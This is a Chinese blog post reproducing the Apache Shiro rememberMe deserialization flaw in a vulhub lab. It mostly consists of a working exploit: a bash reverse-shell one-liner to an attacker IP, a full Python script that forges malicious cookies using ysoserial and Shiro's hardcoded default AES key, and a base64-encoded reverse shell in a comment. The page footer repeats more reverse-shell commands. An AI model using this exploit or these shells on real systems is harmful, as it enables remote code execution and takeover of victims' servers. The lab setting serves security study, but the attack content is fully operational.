漏洞复现-反序列化-apache shiro

最新推荐文章于 2023-06-14 17:05:08 发布
最新推荐文章于 2023-06-14 17:05:08 发布
阅读量262 收藏
点赞数
分类专栏: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38618396/article/details/107992628
版权

0x00、原理说明

0x01、环境搭建

1、vulhub + docker
2、访问ip在这里插入图片描述
在这里插入图片描述

0x02、漏洞利用

制作反弹shell

bash -i >& /dev/tcp/反弹IP/端口 0>&1

然后在 http://www.jackson-t.ca/runtime-exec-payloads.html 上进行java反序列化绕过base64编码
在这里插入图片描述

在监听机出监听反弹端口

在这里插入图片描述

构造恶意cookies

import os
import sys
import time
import json
import uuid
import base64
import argparse
import subprocess
from random import Random
from Crypto.Cipher import AES
from requests import Session


class ShiroExp:
    # tstr = 'test.'
    tstr = ''
    session = Session()

    def __init__(self, target):
        self.target = target

    def get_subd(self):
        r = self.session.get('http://www.dnslog.cn/getdomain.php')
        if r.status_code == 200:
            self.subd = r.text
            self.tstr += self.subd
            print('dnslog SubDomain', self.subd)
            return True
    
    def test(self):
        session = Session()
        session.cookies['rememberMe'] = self.encode_rememberme("ping "+ self.tstr)
        print('send payload')
        session.post(self.target)

    def check(self):
        print('checking...')
        for i in range(3):
            time.sleep(1)
            r = self.session.get("http://www.dnslog.cn/getrecords.php")
            if r.status_code == 200:
                if self.tstr in r.text:
                    print(f"[+] {self.target} 存在漏洞")
                    return True
        print(f"[-] {self.target} 不存在漏洞")

    def run(self):
        self.get_subd()
        self.test()
        self.check()

    def encode_rememberme(self, command):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
        BS   = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        key  =  "kPH+bIxk5D2deZiIxcaaaA=="
        mode =  AES.MODE_CBC
        iv   =  uuid.uuid4().bytes
        encryptor = AES.new(base64.b64decode(key), mode, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext.decode()
        

def run_poc(target):
    exp = ShiroExp(target)
    exp.run()

def run_exp(target, exp):
    # tmp = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
    poc = ShiroExp(target)
    print('rememberMe='+poc.encode_rememberme(exp))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(usage=f'\n\t{os.path.basename(sys.argv[0])} -p -t target\n\t{os.path.basename(sys.argv[0])} -c command')
    parser.add_argument('-p', '--poc', action='store_true', help='对目标使用POC进行漏洞检测')
    parser.add_argument('-c', '--command', action='store', help='生成EXP的命令')
    parser.add_argument('-t', '--target', action='store', help='目标')

    options = parser.parse_args()
    if options.poc and options.target:
        try:
            run_poc(options.target)
        except KeyboardInterrupt:
            print('User Exit...')
            exit()
    elif options.command:
        run_exp(options.target, options.command)
    else:
        parser.print_help()

    # payload = encode_rememberme(sys.argv[1])
    # with open("./payload.cookie", "w") as fpw:
    #     print("rememberMe={}".format(payload.decode()), file=fpw)

执行脚本获得cookie,这时候带上反弹shell的poc
在这里插入图片描述
使用burp抓包
在这里插入图片描述
替换cookies值
在这里插入图片描述
发送之后就可以在监听机出获得shell

0x03、问题总结

ju1uk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这是用于搭建攻防演练演示环境用
红队常用命令速查
热门推荐
Hardworking666的博客
10-23 2万+
红队常用命令
Jackson介绍及使用
西凉的悲伤博客
06-14 3834
Jackson 于 2009 年 5 月首次正式发布,旨在满足快速、正确和轻量级三大宗旨。Jackson 是一个成熟稳定的库,它提供了多种不同的方法来处理 JSON,包括在一些简单的用例中使用注释。Jackson 提供了三个核心模块。) 定义了一个低级流式 API 并包括特定于 JSON 的实现。) 包含标准的 Jackson 注释。Databind() 实现数据绑定和对象序列化。将databind模块添加到项目中还会将流式处理和注释模块添加为传递依赖项。下面的示例将重点关注这些核心模块;
Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)
来到了学渣的博客
11-09 380
环境搭建好后直接访问,漏洞页面如下 看到有/customers和/profile路径 访问请求会发现响应包有json传值 访问/customers和/profile路径 访问json请求中给的路径 构造poc http://www.jackson-t.ca/runtime-exec-payloads.html 先对想要执行的命令进行编码然后转ascii码 转ascii直接写了个小脚本 ch=str(input("请输入一串字符:")) a=[] for i in ch: print(i,"
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
qq_50854662的博客
05-26 1814
Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)
Shiro反序列化漏洞【详细解析】
weixin_47536169的博客
09-01 1万+
Shiro是什么东西 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 原理解释https://www.freebu...
Apache-Shiro反序列化1
08-03
Apache Shiro 反序列化漏洞...Apache Shiro反序列化漏洞是一个严重的安全漏洞,攻击者可以利用该漏洞在服务器上执行恶意命令。为了防止该漏洞,需要升级 Apache Shiro 到 1.2.5 及以上版本,并采取其他安全措施。
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
shiro反序列化复现.zip
08-03
"shiro反序列化复现.zip"这个压缩包很可能是为了帮助开发者或者安全研究人员理解并重现Apache Shiro中的反序列化漏洞反序列化漏洞通常发生在程序接收来自不可信源的序列化对象时,如果这个对象包含了恶意构造的...
shiro反序列化工具,加强版
12-27
在"shiro反序列化工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
最新发布
12-23
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具 Shiro_exploit Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,...
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
shiro-core 低版本漏洞检测
01-31
shiro-core 低版本漏洞检测工具
061-Apache Shiro 反序列化之殇.pdf
09-20
Apache Shiro是一款流行的开源安全框架,它提供了身份...总的来说,Apache Shiro反序列化漏洞揭示了软件安全的重要性,尤其是对于处理敏感信息的应用程序。及时的更新和严格的安全策略可以帮助保护系统免受此类威胁。
shiro-core-1.7.1 jar
07-12
shiro shiro-core-1.7.1 jar shiro漏洞
python操作DNSLOG平台
anan的博客
01-24 7087
python 操作DNSLOG平台
常用的反弹shell的语句
qq_42133828的博客
07-03 725
shell编码:http://www.jackson-t.ca/runtime-exec-payloads.html bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/65.49.135.12/8888 0>&1 & perl版本:...
Jackson快速入门
weixin_34221775的博客
05-30 3160
Java生态圈中有很多处理JSON和XML格式化的类库,Jackson是其中比较著名的一个。虽然JDK自带了XML处理类库,但是相对来说比较低级,使用本文介绍的Jackson等高级类库处理起来会方便很多。 引入类库 由于Jackson相关类库按照功能分为几个相对独立的,所以需要同时引入多个类库,为了方便我将版...
漏洞复现 - Weblogic 反序列化命令执行漏洞(CVE-2018-2628)
Sunnet的博客
01-04 674
漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic 组件进行远程攻击,并可获取目标系统所有权限。 漏洞影响 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 靶场搭建 进入到vulhub
apache shiro反序列化
08-14
这个漏洞是由于Shiro在处理Subject对象的序列化和反序列化过程中存在安全问题而引起的。 为了防止这种漏洞的利用,建议升级到Apache Shiro的最新版本。最新版本中已经修复了这个问题,并增加了安全性的改进。 此外...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值